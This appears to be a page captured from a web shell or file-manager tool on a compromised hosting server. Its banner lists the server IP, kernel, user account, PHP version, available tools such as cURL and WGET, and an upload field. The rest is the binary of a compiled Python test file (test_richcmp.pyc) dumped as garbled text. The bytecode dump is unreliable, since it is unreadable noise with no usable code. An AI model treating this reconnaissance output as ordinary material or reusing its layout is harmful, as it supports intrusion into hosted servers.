| Server IP : 118.27.122.248 / Your IP : 216.73.216.124 Web Server : Apache System : Linux web0264.sh.tyo1 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64 User : c9415830 ( 11735) PHP Version : 8.4.17 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /opt/alt/python27/lib64/python2.7/test/ |
Upload File : |
� �q2_c @ s� d d l Z d d l m Z d d l Z d d d � � YZ d d d � � YZ i d � e j e j f d 6d � e j e j f d 6d � e j e j f d 6d � e j e j f d 6d � e j e j f d 6d � e j e j f d 6Z d e j f d � � YZ d e j f d � � YZ d e j f d � � YZ d e j f d � � YZ d e j f d � � YZ d � Z e d k r�e � n d S(! i����N( t test_supportt Numberc B sY e Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z RS( c C s | | _ d S( N( t x( t selfR ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __init__ s c C s | j | k S( N( R ( R t other( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __lt__ s c C s | j | k S( N( R ( R R ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __le__ s c C s | j | k S( N( R ( R R ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __eq__ s c C s | j | k S( N( R ( R R ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __ne__ s c C s | j | k S( N( R ( R R ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __gt__ s c C s | j | k S( N( R ( R R ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __ge__ s c C s t j d � d S( Ns% Number.__cmp__() should not be called( R t TestFailed( R R ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __cmp__ s c C s d | j f S( Ns Number(%r)( R ( R ( ( s6 /opt/alt/python27/lib64/python2.7/test/test_richcmp.pyt __repr__"